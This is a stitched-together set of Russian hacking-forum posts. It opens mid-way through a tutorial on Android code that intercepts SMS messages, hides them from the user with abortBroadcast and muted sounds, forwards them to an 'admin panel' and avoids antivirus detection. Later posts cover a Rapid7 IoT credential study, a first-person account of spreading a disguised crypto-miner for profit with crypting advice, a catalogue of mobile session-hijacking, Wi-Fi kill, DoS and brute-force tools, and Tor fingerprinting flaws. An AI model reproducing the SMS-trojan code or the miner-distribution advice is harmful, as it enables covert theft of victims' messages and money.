intent1.putExtra("date", sms.RecieveDate); context.startService(intent1); // Запуск сервиса обработки сообщения. abortBroadcast(); // функция для отмены передачи этого события дальше приложениям. } private String getMessageFromSMSs(SmsMessage[] sms) { String str=""; for(SmsMessage message:sms) { str += message.getMessageBody().toString(); } return str; } public class Sms{ public String SenderId; public String Text; public Date RecieveDate; public int Status; } } Вот, основной класс который занимается перехватом смс. Кажется, можно сделать глоток пивка и расслабиться. Но нет, это не будет работать в связи с тем, что нам еще нужно сделать класс, для обработки смс сообщения. По-сути, сейчас мы сделали только перехват. Сразу возникает вопрос: “А почему нельзя все сделать в одном месте?” Проблема кроется во времени обработки. Обработка событий не может быть долгой. И времени хватает только на чтение данных и передачу их сервису. Intent intent1 = new Intent(context, SMSService.class); // подготовка Запуска сервиса обработки сообщения. intent1.putExtra("phone", sms.SenderId); intent1.putExtra("text", sms.Text); intent1.putExtra("date", sms.RecieveDate); context.startService(intent1); // Запуск сервиса обработки сообщения. Что и делает выше описанный код. Мы говорим какой класс запустить (он обязательно должен быть зарегистрирован как сервис) и передаем параметры. public class SMSService extends Service { @Override public IBinder onBind(Intent intent) { return null; } @Override public int onStartCommand(Intent intent, int flags, int startId) { String sms_tel = intent.getExtras().getString("phone"); String sms_body = intent.getExtras().getString("text"); String sms_date = intent.getExtras().getString("date"); //обрабатываем данные и если надо отсылаем в админку. return START_STICKY; } } Дабы вышеописанный метод работал, нас нужно объявить в манифесте приложения. Чтобы android знал, что мы хотим делать. Но учтите, что при установке, пользователь увидит это в разрешениях приложения. <uses-permission android:name="android.permission.RECEIVE_SMS" /> <receiver android:name=".SMSMonitor"> <intent-filter android:priority="100"> <action android:name="android.provider.Telephony.SMS_RECEIVED" /> </intent-filter> </receiver> Дает право нам перехватывать смс. Есть хороший параметр приоритет, тут значение может быть от 1 до 999. Я рекомендую использовать от 100, но не сильно высоко. На этот параметр может ругаться антивирус. Если появился детект, можете искать его тут. Чем выше значение тем вы раньше будете стоять на обработку в очереди событий. <service android:name=".SMSService" /> //нужно для того,чтобы мы смогли запускать класс как сервис. Собираем, проверяем, все работает. Ура. Чтение сохранённых смс String INBOX = "content://sms/inbox"; //String SENT = "content://sms/sent"; //String DRAFT = "content://sms/draft"; Cursor cursor = cnt.getContentResolver().query(Uri.parse(INBOX), null, null, null, null); if (cursor.moveToFirst()) { do { for(int idx=0;idx<cursor.getColumnCount();idx++) { if(cursor.getColumnName(idx).toString().equalsIgnoreCase(Config.szAddress)){ // cursor.getString(idx)// номер телефона } if(cursor.getColumnName(idx).toString().equalsIgnoreCase(Config.szBody)){ // cursor.getString(idx) // сообщение } if(cursor.getColumnName(idx).toString().equalsIgnoreCase(Config.szDate)){ // cursor.getString(idx) // дата сообщения } } } while (cursor.moveToNext()); } else { // нету смс } Для работы данного способа требуется разрешение <uses-permission android:name="android.permission.READ_SMS" /> Прячем “плохие” сообщения Я еще не объяснил где происходит удаление смс. И поэтому перейдем к этому вопросу. Тем более пива у вас уже должно заканчиваться, если конечно вы не ящик взяли ? Самая главная функция abortBroadcast(); . Она говорит системе, чтобы она не передавала сообещение другим обработчикам включая стандартный смс менеджер от android‘a. Поэтому лучше иметь приоритет выше чем все приложения такого типа. Так же эта функция рано или поздно, станет вашим детектом. Но есть способы обойти это. Удаление смс вручную, после обработки. Но тут вы должны будете приглушить звук смс, для того чтобы пользователь ни чего не заподозрил. Удаление смс из очереди. (не пользовался) P.S. Ну и на последок, данный способ будет работать на android‘е 2.х. От версии 4.4 и выше, он работать не будет (может только перехват, без отмены очереди). Там требуются другие методы. Но мы и это пройдем. Что же делать? Я опишу два способа, но первый будет в качестве примера, а второй покажет Вам, как делать правильно. Метод плоских файлов Дописывать в конец файла, а при отправке очищать файл. Структура файла: {json}\n {json}\n ......... {json}\n Код чтения всего файла: File fl = new File(filePath); FileInputStream fin = new FileInputStream(fl); String ret = convertStreamToString(fin); fin.close(); try { FileWriter fw = new FileWriter(filePath, true); fw.write(Value + "\n"); fw.close(); } catch (IOException ioe) { } Тут ничего сложного: читай, пиши. Есть одно “Но”. Мы работаем в потоках, и может случиться одновременная запись и удаление, а это надо контролировать. Но мы же спецы, нам надо сделать чтобы было круто. И мы переходим к базам данных. Mysqli или как хранить данные по ФенШую Мы рассмотрим работу с базой данных на примере чтения и записи. У нас простая табличка, где будут IDи StringJSON, которую после отправки мы будем очищать. public class KNOCKERDatabase extends SQLiteOpenHelper { private static final int DATABASE_VERSION = 1; private static final String DATABASE_NAME = "knocker"; private static final String TABLE_KNOCKER = "knocker"; private static final String KEY_ID = "id"; private static final String KEY_JSON = "stringjson"; public KNOCKERDatabase(Context context) { super(context, DATABASE_NAME, null, DATABASE_VERSION); } @Override public void onCreate(SQLiteDatabase db) { String CREATE_TABLE = "CREATE TABLE " + TABLE_KNOCKER + "(" + KEY_ID + " INTEGER PRIMARY KEY," + KEY_JSON + " TEXT," + ")"; db.execSQL(CREATE_TABLE); } void addJson(String json) { SQLiteDatabase db = this.getWritableDatabase(); ContentValues values = new ContentValues(); values.put(KEY_JSON, json); db.insert(TABLE_KNOCKER, null, values); db.close(); } public List<String> getAllJson() { List<String> jsons = new ArrayList<String>(); String selectQuery = "SELECT * FROM " + TABLE_KNOCKER; SQLiteDatabase db = this.getWritableDatabase(); Cursor cursor = db.rawQuery(selectQuery, null); if (cursor.moveToFirst()) { do { jsons.add(cursor.getString(1)); } while (cursor.moveToNext()); } return jsons; } public void deleteRows(String num) { SQLiteDatabase db = this.getWritableDatabase(); String del ="delete from " + TABLE_KNOCKER + " where " + KEY_ID + " in (select " + KEY_ID + " from " + TABLE_KNOCKER + " order by _id LIMIT " + num + ");"; db.execSQL(del); db.close(); } public int getCount() { String countQuery = "SELECT * FROM " + TABLE_KNOCKER; SQLiteDatabase db = this.getReadableDatabase(); Cursor cursor = db.rawQuery(countQuery, null); cursor.close(); return cursor.getCount(); } } Теперь можно перейти к практике, как это использовать. Шаг первый. Запись. KNOCKERDatabase db = new KNOCKERDatabase(context); db.addJson(DATA); Где DATA – это запрос для отправки на сервер.Шаг второй. Чтение. KNOCKERDatabase db = new KNOCKERDatabase(this); List<String> jsons = db.getAllJson(); После прочтения записей, считаем их количество (через getCount), чтобы не удалить лишнее и избавляемся от них через deleteRows.
  12. Исследователи безопасности из компании Rapid7 проанализировали Android-приложения для управления IoT-устройствами Wink Hub 2 и Insteon Hub. В ходе исследования было выявлено, что оба приложения хранят конфиденциальные учетные данные в файлах конфигурации в незашифрованном виде. Как правило, Android-приложения не имеют доступа к файлам других приложений (за исключением системных служб со специальными привилегиями). Однако существуют способы, с помощью которых злоумышленники могут получить доступ к данным, поэтому Android предоставляет встроенное безопасное хранилище ключей для хранения конфиденциальной информации. Существуют различные методы шифрования учетных данных в хранилище, но некоторые разработчики по непонятным причинам не используют эти механизмы. Данные приложений могут быть легко извлечены из утерянных или украденных телефонов, не имеющих сильную парольную защиту, или не использующих шифрование. По словам исследователей из Rapid7, для этого не требуются особые навыки - только Google и 45 минут времени. Как выяснили эксперты, Android-приложение для управления хабом Wink Hub 2 хранило в незащищенном виде токены доступа к OAuth, используемые серверами Wink для отслеживания сессий авторизованных пользователей. Токены позволяют мобильным приложениям отправлять команды на устройство Wink Hub через облачный сервис компании. Как отметили исследователи, даже когда были сгенерированы новые токены, старые все еще оставались действительными. Таким образом, даже если пользователь попытался бы уменьшить риски после потери смартфона, изменив пароли в Wink, токены OAuth, хранящиеся на их устройствах, оставались бы актуальными. По словам исследователя, Wink уже выпустила обновление для своего приложения и планирует исправить проблему с токенами в ближайшем будущем.Еще одна уязвимость была обнаружена в устройствах Insteon. Компания выпускает различные «умные» переключатели, лампочки, розетки, датчики, дверные замки, камеры и другие IoT-устройства. Гаджеты обмениваются сигналами в проприетарном радиочастотном диапазоне на частоте 915 МГц. По словам исследователей, из-за отсутствия шифрования злоумышленники, находящиеся в коммуникационном диапазоне, могут перехватить такой сигнал, а затем повторно использовать его для получения контроля над устройством. В ходе эксперимента исследователям безопасности удалось перехватить и воспроизвести сигнал Insteon Garage Door Control Kit и открыть дверь гаража. Учетные данные в приложении для управления хабом Insteon также хранились в незашифрованном виде, в том числе логины/пароли для учетных записей пользователей и непосредственного управления устройством-хабом через локальную сеть. Исследователи сообщили компании о наличии уязвимостей, однако Insteon пока не предприняла никаких действий по их устранению. Wink – компания, занимающаяся разработкой программных и аппаратных продуктов, которые можно подключить к домашним IoT-устройствам и управлять ими с помощью пользовательского интерфейса. Insteon - дочернее подразделение компании Smartlabs, занимающееся разработкой технологии домашней автоматизации, которая позволяет переключателям света, лампам, термостатам, датчикам движения и другим электрическим устройствам взаимодействовать друг с другом через линии электропередач, радиочастотную связь или то и другое.
  13. Начну с того, что это чернуха (ст 273 ук рф), и как большинство тёмных дел, она приносит баснословные профиты (на пике у меня было 2700 баксов в НЕДЕЛЮ). Дада, продолжи заниматься этим, я бы давно был на островах и меня бы мало чего заботило, но во всём нужно знать меру, особенно в тёмных делах. Как же я достиг такого профита? Изи изи рил ток синк эбаут ит. Нужен качественный билд и охуевшая криптовка, которую палят максимум 4 антивируса и то ноунэймовских. И нужны хорошие познания СИ. Я распространял свой майнер под видом программы для заработка на буксах. Была мысль связаться с кодером и сделать РЕАЛЬНО программу по заработку, но в которую будет вшит майнер. К примеру, в прогу транслировать задания буксов, подать это под соусом удобности и конечно же вшить туда майнер. НО заходило итак всё отлично, я не парился. Недели две мне лилось по 2000 баксов в неделю, это по 16к в день. Половину из этих денег я прогулял, потратил на подарки родителям, а остальную часть пустил в дело. Те воспоминания в моей голове выражаются улётной безбашенностью и лёгкими бабками, осталось только тёлок и наркоту подвезти (которую не употребляю и вам не советую). Как и всё хорошее, такое не может продолжаться вечно. Будь я дураком - я бы не остановился, делал бы деньги и в итоге отъехал на кичу. Масштабы были просто огромными и возможный срок, думаю, тоже. Если вы хотите влиться в эту тему, то моё очень важное наставление - не перейдите ту черту, за которую заходить нельзя. Срубили бабок - обелили их и забыли про майнинг. Кстати да, я работал по аудитории РФ, потому что в Европе люди более прошаренные в этом плане. И это добавляет еще более рисков. Используйте хорошую криптовку, не жалейте на нее денег, при грамотном подходе всё моментально окупится. P.S: я не криптую, не делаю билды и не даю ничьи контакты. С этим делом я завязал, так что извиняйте
  14. Хотелось поделится с вами, читателями набором хакерских утилит для Android и iOS устройств. Не забывайте, что для этих программ вам нужно прошить ваше устройство на Root (Android) и JailBreak (iOS). Сетевые сканеры: PIPS Незаметный смартфон, который в отличие от ноутбука легко помещается в карман и никогда не вызывает подозрений, может быть полезен для исследования сети. Выше мы уже сказали, как можно установить Nmap, но есть еще один вариант. PIPS — это специально адаптированный под Android, хотя и неофициальный порт сканера Nmap. А значит, ты сможешь быстро найти активные устройства в сети, определить их ОС с помощью опций по fingerprinting’у, провести сканирование портов — короче говоря, сделать все, на что способен Nmap. Fing С использованием Nmap’а, несмотря на всю его мощь, есть две проблемы. Во-первых, параметры для сканирования передаются через ключи для запуска, которые надо не только знать, но еще и суметь ввести с неудобной мобильной клавиатуры. А во-вторых, результаты сканирования в консольном выводе не такие наглядные, как того хотелось бы. Этих недостатков лишен сканнер Fing, который очень быстро сканирует сеть, делает fingerprinting, после чего в понятной форме выводит список всех доступных устройств, разделяя их по типам (роутер, десктоп, iPhone и так далее). При этом по каждому хосту можно быстро посмотреть список открытых портов. Причем прямо отсюда можно подключиться, скажем, к FTP, используя установленный в системе FTP-клиент, — очень удобно. NetAudit Когда речь идет об анализе конкретного хоста, незаменимой может оказаться утилита NetAudit. Она работает на любом Android-устройстве (даже нерутованном) и позволяет не только быстро определить устройства в сети, но и исследовать их с помощью большой fingerprinting-базы для определения операционной системы, а также CMS-систем, используемых на веб-сервере. Сейчас в базе более 3000 цифровых отпечатков. Net Tools Если же нужно, напротив, работать на уровне ниже и тщательно исследовать работу сети, то здесь не обойтись без Net Tools. Это незаменимый в работе системного администратора набор утилит, позволяющий полностью продиагностировать работу сети, к которой подключено устройство. Пакет содержит более 15 различного рода программ, таких как ping, traceroute, arp, dns, netstat, route. Манипуляции с трафиком: FaceNiff Если говорить о боевых приложениях для Android, то одним из самых нашумевших является FaceNiff, реализующий перехват и внедрение в перехваченные веб-сессии. Скачав APK-пакет с программой, можно практически на любом Android-смартфоне запустить этот хек-инструмент и, подключившись к беспроводной сети, перехватывать аккаунты самых разных сервисов: Facebook, Twitter, «ВКонтакте» и так далее — всего более десяти. Угон сессии осуществляется средствами применения атаки ARP spoofing, но атака возможна только на незащищенных соединениях (вклиниваться в SSL-трафик FaceNiff не умеет). Чтобы сдержать поток скрипткидисов, автор ограничил максимальное число сессий тремя — дальше нужно обратиться к разработчику за специальным активационным кодом. DroidSheep Если создатель FaceNiff хочет за использование денежку, то DroidSheep — это полностью бесплатный инструмент с тем же функционалом. Правда, на официальном сайте ты не найдешь дистрибутива (это связано с суровыми законами Германии по части security-утилит), но его без проблем можно найти в Сети. Основная задача утилиты — перехват пользовательских веб-сессий популярных социальных сетей, реализованный с помощью все того же ARP Spoofing’а. А вот с безопасными подключениями беда: как и FaceNiff, DroidSheep наотрез отказывается работать с HTTPS-протоколом. Network Spoofer Эта утилита также демонстрирует небезопасность открытых беспроводных сетей, но несколько в другой плоскости. Она не перехватывает пользовательские сессии, но позволяет с помощью спуфинг-атаки пропускать HTTP-трафик через себя, выполняя с ним заданные манипуляции. Начиная от обычных шалостей (заменить все картинки на сайте троллфейсами, перевернуть все изображения или, скажем, подменив выдачу Google) и заканчивая фишинговыми атаками, когда пользователю подсовываются фейковые страницы таких популярных сервисов, как facebook.com, linkedin.com, vkontakte.ru и многих других. Anti (Android Network Toolkit by zImperium LTD) Если спросить, какая хак-утилита для Android наиболее мощная, то у Anti, пожалуй, конкурентов нет. Это настоящий хакерский комбайн. Основная задача программы — сканирование сетевого периметра. Далее в бой вступают различные модули, с помощью которых реализован целый арсенал: это и прослушка трафика, и выполнение MITM-атак, и эксплуатация найденных уязвимостей. Правда, есть и свои минусы. Первое, что бросается в глаза, — эксплуатация уязвимостей производится лишь с центрального сервера программы, который находится в интернете, вследствие чего о целях, не имеющих внешний IP-адрес, можно забыть. Туннелирование трафика: Total Commander Хорошо известный файловый менеджер теперь и на смартфонах! Как и в настольной версии, тут предусмотрена система плагинов для подключения к различным сетевым директориям, а также канонический двухпанельный режим — особенно удобно на планшетах. SSH Tunnel Хорошо, но как обеспечить безопасность своих данных, которые передаются в открытой беспроводной сети? Помимо VPN, который Android поддерживает из коробки, можно поднять SSH-туннель. Для этого есть замечательная утилита SSH Tunnel, которая позволяет завернуть через удаленный SSH-сервер трафик выбранных приложений или всей системы в целом. ProxyDroid Часто бывает необходимо пустить трафик через прокси или сокс, и в этом случае выручит ProxyDroid. Все просто: выбираешь, трафик каких приложений нужно туннелировать, и указываешь прокси (поддерживаются HTTP/HTTPS/SOCKS4/SOCKS5). Если требуется авторизация, то ProxyDroid это также поддерживает. К слову, конфигурацию можно забиндить на определенную беспроводную сеть, сделав разные настройки для каждой из них. Беспроводные сети: Wifi Analyzer Встроенный менеджер беспроводных сетей не отличается информативностью. Если нужно быстро получить полную картину о находящихся рядом точках доступа, то утилита Wifi Analyzer — отличный выбор. Она не только покажет все находящиеся рядом точки доступа, но и отобразит канал, на котором они работают, их MAC-адрес и, что важнее всего, используемый тип шифрования (увидев заветные буквы «WEP», можно считать, что доступ в защищенную сеть обеспечен). Помимо этого утилита идеально подойдет, если нужно найти, где физически находится нужная точка доступа, благодаря наглядному индикатору уровня сигнала. WiFiKill Эта утилита, как заявляет ее разработчик, может быть полезна, когда беспроводная сеть под завязку забита клиентами, которые используют весь канал, а именно в этот момент нужен хороший коннект и стабильная связь. WiFiKill позволяет отключить клиентов от интернета как выборочно, так и по определенному критерию (к примеру, возможно постебаться над всеми яблочниками). Программа всего-навсего выполняет атаку ARP spoofing и перенаправляет всех клиентов на самих себя. Этот алгоритм до глупости просто реализован на базе iptables. Такая вот панель управления для беспроводных сетей фастфуда. Аудит веб-приложений: HTTP Query Builder Манипулировать HTTP-запросами с компьютера — плевое дело, для этого есть огромное количество утилит и плагинов для браузеров. В случае со смартфоном все немного сложнее. Отправить кастомный HTTP-запрос с нужными тебе параметрами, например нужной cookie или измененным User-Agent, поможет HTTP Query Builder. Результат выполнения запроса будет отображен в стандартном браузере. AnDOSid Наверняка ты слышал о такой нашумевшей программе вывода из строя веб-серверов, как Slowloris. Принцип ее действия: создать и удерживать максимальное количество подключений с удаленным веб-сервером, таким образом не давая подключиться к нему новым клиентам. Так вот, AnDOSid — аналог Slowloris прямо в Android-девайсе! Скажу по секрету, двухсот подключений достаточно, чтобы обеспечить нестабильную работу каждому четвертому веб-сайту под управлением веб-сервера Apache. И все это — с твоего телефона! iOS: Не менее популярна среди разработчиков security-утилит платформа iOS. Но если в случае с Android права root’а были нужны только для некоторых приложений, то на устройствах от Apple джейлбрейк обязателен почти всегда. К счастью, даже для последней прошивки iДевайсов уже есть тулза для джейлбрейка. Вместе с полным доступом ты еще получаешь и альтернативный менеджер приложений Cydia, в котором уже собраны многие утилиты. Работа с системой: MobileTerminal Первое, с чего хочется начать, — это установка терминала. По понятным причинам в стандартной поставке мобильной ОС его нет, но он нам понадобится, чтобы запускать консольные утилиты, о которых мы далее будем говорить. Лучшей реализацией эмулятора терминала является MobileTerminal — он поддерживает сразу несколько терминалов, жесты для управления (например, для передачи Control-C) и вообще впечатляет своей продуманностью. Перехват данных: Pirni & Pirni Pro Теперь, когда доступ к консоли есть, можно попробовать утилиты. Начнем с Pirni, вошедшей в историю как полноценный сниффер для iOS. К сожалению, конструктивно ограниченный модуль Wi-Fi, встроенный в устройство, невозможно перевести в promiscious-режим, необходимый для нормального перехвата данных. Так что для перехвата данных используется классический ARP-спуфинг, с помощью которого весь трафик пропускается через само устройство. Стандартная версия утилиты запускается из консоли, где помимо параметров MITM-атаки указывается имя PCAP-файла, в который логируется весь трафик. У утилиты есть более продвинутая версия — Pirni Pro, которая может похвастаться графическим интерфейсом. Причем она умеет на лету парсить HTTP-трафик и даже автоматически вытаскивать оттуда интересные данные (к примеру, логины-пароли), используя для этого регулярные выражения, которые задаются в настройках. Ettercap-NG Трудно поверить, но этот сложнейший инструмент для реализации MITM-атак все-таки портировали под iOS. После колоссальной работы получилось сделать полноценный мобильный порт. Чтобы избавить себя от танцев с бубном вокруг зависимостей во время самостоятельной компиляции, лучше установить уже собранный пакет, используя Cydia, предварительно добавив в качестве источника данных theworm.altervista.org/cydia (репозиторий TWRepo). В комплекте идет и утилита etterlog, которая помогает извлечь из собранного дампа трафика различного рода полезную информацию (к примеру, аккаунты доступа к FTP). Сетевые сканеры: Scany Какой программой пользуется любой пентестер в любой точке планеты независимо от целей и задач? Сетевым сканером. И в случае с iOS это, скорее всего, будет мощнейший тулкит Scany. Благодаря набору встроенных утилит можно быстро получить подробную картину о сетевых устройствах и, к примеру, открытых портах. Помимо этого пакет включает в себя утилиты тестирования сети, такие как ping, traceroute, nslookup. Fing Впрочем, многие отдают предпочтение Fing’у. Сканер имеет достаточно простой и ограниченный функционал, но его вполне хватит для первого знакомства с сетью, скажем, кафетерия . В результатах отображается информация о доступных сервисах на удаленных машинах, MAC-адреса и имена хостов, подключенных к сканируемой сети. Nikto Казалось бы, про Nikto все забыли, но почему? Ведь этот веб-сканер уязвимостей, написанный на скрипт-языке (а именно на Perl), ты легко сможешь установить через Cydia. А это значит, что ты без особого труда сможешь запустить его на своем джейлбрейкнутом устройстве из терминала. Nikto с радостью предоставит тебе дополнительную информацию по испытуемому веб-ресурсу. К тому же ты своими руками можешь добавить в его базу данных знаний собственные сигнатуры для поиска. sqlmap Этот мощный инструмент для автоматической эксплуатации SQL-уязвимостей написан на Python, а значит, установив интерпретатор, им без проблем можно пользоваться прямо с мобильного устройства. Восстановление паролей: Hydra Легендарная программа, помогающая «вспомнить» пароль миллионам хакеров по всему миру была портирована под iOS. Теперь прямо с iPhone’а возможен перебор паролей к таким сервисам, как HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 и многим другим. Правда, для более эффективной атаки лучше запастись хорошими словарями для брутфорса.
  15. Доктор Нил Кравец, сам себя называющий специалистом по безопасности и судебно-медицинской экспертизе, воспользовался свом личным блогом, чтобы опубликовать статью о трех основных уязвимостях в браузере Tor. Сначала прочитав эту статью, можно было бы задаться вопросом, почему доктор Кравец использовал свой личный блог вместо проверенных каналов. Как оказалось это было сделано специально, для исследования, так как: «официальные» каналы редко вызывают резонанс и публикуют подобные статьи. Основываясь на его статье, в которой изложены и указаны три "уязвимости" в Tor браузере, можно быть уверенным в отсутствии связи между Tor Project и (по крайней мере, в данном случае) службой безопасности обнаруживающей уязвимости. Пробегаясь по некоторым из его постов стало понятно, что у исследователя были сложные отношения с проектом Tor и самим браузером. Но также он показал, что он не был опытен в мире анонимности и конфиденциальности, в Интернете. Он рассказал о трудностях, с которыми он столкнулся, когда пытался связаться с кем-либо (кроме официальных лиц в Twitter) из Tor Project. Предложения об анонимности, изложенные доктором Краветцем в разделе «отпечатки пальцев / fingerprint» (подразумеваются цифровые отпечатки). Краткое описание: Tor браузер, в первую очередь, защищает Ваш IP-адрес, от использования его в качестве идентификации вашей личности. Отпечаток переходит в незначительную некритическую утечку данных, которая со временем может выделить пользователя среди массы других, даже если все они выглядят одинаково. Даже Mozilla работавшая над Tor-like приняла антитеррористические меры в самом Firefox. Изучая безопасность Хосе Карлос Норте смог объяснить эту терминологию намного лучше, чем я: Первая проблема с отпечатками, описанная доктором Кравецем, была в размере окна и экрана. Поскольку компьютеры и мобильные устройства имеют экраны разных размеров, браузер Tor сообщает вымешленное значение: что экран и окна имеют одинаковый размер. Если размер окна и размер экрана совпадают JavaScript может сразу обнаружить TOR-Browser. Идея доктора Кравеца в том, чтобы Tor всегда сообщал, что клиент использует экран с размером больше, чем у открытого окна. Вторая проблема - это проблема с экраном, которая повлияла только на пользователей MacOS. (Или, в основном на MacOS.) Браузер иногда неправильно вычислял размера экрана и, таким образом, пересчитавал стандартный размер окна на - 1000 × 1000. Если экран меньше этого, тогда браузер выберет широкий экран, то есть кратно 200 пикселей, а высота, кратная 100 пиксели. Он объяснил, что этот вопрос был некомпетентным, но ситуацию исправили при удалении док-станции. И поэтому исследователь объяснил, браузер Tor который пользователь запускал в Mac OS имел изьяны. И третья проблема - с полосой прокрутки. Используя разные операционные системы, мы получаем разную ширину полосы прокрутки. Браузер Tor создает иллюзию того,что все выглядят едино в соотношении размер экрана/размер окна. Но если отображаются полосы прокрутки, размер видимого экрана можно вычесть от размера окна, чтобы найти толщину полосы прокрутки. Благодаря этим исследованиям мы узнали: Tor в Mac OS использует 15 пикселей размера окна. Tor в современных Windows использует 17 пикселей. Tor на Linux имеет более спецефическую идентификацию. «Размер зависит от варианта Linux и настольной платформы, например "Gnome" или "KDE". "10 пикселей на Linux Mint с Gtk-3.0. 13 для Ubuntu 16.04 с Gnome. Неофициальные браузеры Tor для мобильных устройств используют нулевые пиксели.